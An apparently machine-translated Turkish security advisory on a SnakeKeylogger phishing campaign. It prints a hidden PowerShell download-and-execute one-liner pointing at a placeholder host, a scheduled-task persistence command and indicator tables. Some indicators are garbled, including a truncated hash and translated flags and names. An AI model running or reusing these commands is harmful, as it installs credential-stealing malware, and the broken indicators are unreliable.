Yeni gözlemlenen bir bilgi çalma kampanyası, CPA Global ve Clarivate’in meşru havale tavsiyesi gibi görünen silahlı e-postalar yoluyla SnakeKeylogger kötü amaçlı yazılımının gizli bir versiyonunu kullanıyor.
Araştırmacılar enfeksiyon vektörünü ilk olarak 7 Ekim 2025’te, alıcıların kötü amaçlı bir BAT komut dosyası içeren ekteki ISO veya ZIP dosyasını indirmelerini isteyen “07 Ekim 2025 tarihli ödeme için havale tavsiyesi” başlıklı mesajlar almasıyla belirlediler.
Analiz, kötü amaçlı yazılımın SnakeKeylogger veri yükünü almak, yürütmek ve toplanan kimlik bilgilerini saldırganın kontrolündeki altyapıya sızdırmak için gömülü PowerShell komutlarından yararlandığını ortaya koyuyor.
Kampanyanın sosyal mühendisliği, “CPA-Ödeme Dosyaları” gibi sahte gönderen takma adları ve CPA Global veya Clarivate’e atıfta bulunan görünen adlar etrafında dönüyor ve kimlik avı tuzağına sahte meşruiyet kazandırıyor.
E-postalar, alıcılardan ekteki ödeme tavsiyesini incelemelerini isteyen kısa bir metin ve kurumsal antetli kağıdı taklit eden bir resim içerir.
Kötü amaçlı ek, her ikisi de tek bir BAT komut dosyası içeren bir ISO görüntüsü veya sıkıştırılmış bir ZIP arşivi olarak teslim edilir. Bu betik yürütüldüğünde, SnakeKeylogger implantını uzak bir sunucudan indirip çalıştıran bir dizi PowerShell komutunu sessizce çağırır.
ISO kapsayıcılarının kullanılması, kampanyanın yalnızca ZIP’e yönelik basit tarama politikalarını atlamasına yardımcı olurken, çift aşamalı mimari algılamayı karmaşık hale getirir.
PowerShell Tabanlı Dağıtım
Kullanıcının ekle etkileşimi üzerine BAT betiği, aşağıdakine benzer bir PowerShell tek satırlık çalıştırır:
powershell@echo off
powershell -NoProfile -WindowStyle Hidden -Command "$u='http://malicious[.]domain/loader.exe';$p='$env:TEMP\update.exe';Invoke-WebRequest -Uri $u -OutFile $p;Start-Process $p"
Bu komut, PowerShell’e SnakeKeylogger yürütülebilir dosyasını indirmesi talimatını verir (loader.exe) geçici bir dizine kopyalayın ve başlatın.
Gizli pencere stili minimum görsel gösterge sağlar. SnakeKeylogger çalıştırıldığında, kimlik bilgilerini ve oturum belirteçlerini yakalamak için tarayıcı işlemlerine ve keylogging API’lerine bağlanır.
Kötü amaçlı yazılım, temel işlevlerini 800 KB’nin altındaki hafif bir yürütülebilir dosyada paketleyerek hızlı indirme ve yürütme olanağı sağlıyor.
Araştırmacılar, verinin aşağıdaki gibi yasal süreçlere enjekte etmek için Windows API çağrılarını kullandığını gözlemledi: explorer.exe veya svchost.exeuç nokta koruma çözümlerinden daha da kaçınıyor.
Veri Süzme ve Kalıcılık Mekanizmaları
SnakeKeylogger, tuş vuruşlarını ve pano verilerini topladıktan sonra günlükleri sıkıştırır ve bunları HTTP POST istekleri üzerinden güvenliği ihlal edilmiş bir web sunucusunda barındırılan bir komut ve kontrol uç noktasına aktarır.
Süzme trafiği, standart HTTP kullanıcı aracılarının kullanılması ve base64 kodlaması aracılığıyla şifreleme nedeniyle meşru görünmektedir. Kötü amaçlı yazılım, her saat başı tetiklenen “SysUpdate” adlı zamanlanmış bir görev oluşturarak kalıcılığa ulaşıyor:
powershellschtasks /Create /TN "SysUpdate" /TR "%TEMP%\update.exe" /SC HOURLY /F
Bu, süreç sonlandırılsa bile otomatik olarak yeniden başlatılmasını sağlar. Analistler ayrıca tehdit aktörünün geri dönüş bağlantısı için birden fazla alt etki alanı kaydettirdiğini ve bunun da C2 altyapısının yüksek düzeyde kullanılabilirliğine olanak sağladığını keşfetti.
SnakeKeylogger kampanyası, basit sosyal mühendisliğin PowerShell gibi yerleşik Windows araçlarıyla bir araya getirilmesinin, gizli kimlik bilgileri hırsızlığını geniş ölçekte nasıl kolaylaştırabileceğini gösteriyor.
Kuruluşlar, ödemeyle ilgili e-postaların incelenmesi konusunda kullanıcı farkındalığını güçlendirmeli, sağlam ek koruma politikaları uygulamalı ve kötü niyetli süreç ekleme ve veri sızdırma faaliyetlerini yakalamak için davranış temelli algılamayı kullanmalıdır.
Zamanlanmış görevlerin ve ağ çıkış noktalarının gelişmiş günlüğe kaydedilmesi, hassas veriler tehlikeye atılmadan önce bu tehdidin tanımlanması ve ortadan kaldırılması açısından kritik öneme sahip olacaktır.
Uzlaşma Göstergeleri
Güvenlik ekipleri bu kampanyayı tespit etmek ve azaltmak için aşağıdaki IoC’leri izlemelidir:
| Gösterge Türü | Değer |
|---|---|
| Kötü amaçlı alan adı | kötü amaçlı.domain |
| SHA256 (loader.exe) | 9f3c2a5b4d6e8f12c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8 |
| Zamanlanmış görev adı | Sistem Güncellemesi |
| PowerShell tek satırlık bayrak | -NoProfile -WindowStyle Gizli -Komut |
| Kimlik avı gönderen takma adı | CPA-Ödeme Dosyaları |
Güvenlik ekiplerine, çevre ve uç nokta katmanlarında tanımlanan etki alanlarını, karma değerlerini ve zamanlanmış görevleri engellemeleri önerilir.
| SHA256 Karma | Dosya Türü | Tanım | Ek Ayrıntılar |
|---|---|---|---|
| 1bf2e282e0b58814838af57c8792b6147eacedb3f954821b8eea3b79e1f77cb3 | ZIP (posta eki) | Kötü amaçlı arşiv dosyası | E-posta eki olarak teslim edilir |
| fb17cc142e92edd5c683c3d53ff8e15f73c67b65df116827f92c9f81c672ec26 | ISO (posta eki) | Kötü amaçlı disk görüntüsü | E-posta eki olarak teslim edilir |
| 929fc6575e8ca6b7a657c784254693c4a343e0576bc64a8ba42eac5003796e68 | BAT (indirici) | Toplu komut dosyası indiricisi | Aşağıdaki URL’den bir PowerShell betiği indirir |
| Yok | PS komut dosyası URL’si | BAT tarafından indirilen PowerShell betiği | hxxp://fxa[.]sabitaxt[.]com/mc55tP.ps1 |
E-posta filtreleme çözümleri, ISO dosya incelemesini daha sıkı uygulamalı ve eklerde PowerShell komutları içeren tüm e-postaları işaretlemelidir. Uç nokta koruma platformlarının, anormal süreç enjeksiyonunu ve onaylanmamış zamanlanmış görevleri tespit edecek şekilde ayarlanması gerekir.
Anında Güncellemeler Almak ve GBH’yi Google’da Tercih Edilen Kaynak Olarak Ayarlamak için bizi Google Haberler, LinkedIn ve X’te takip edin.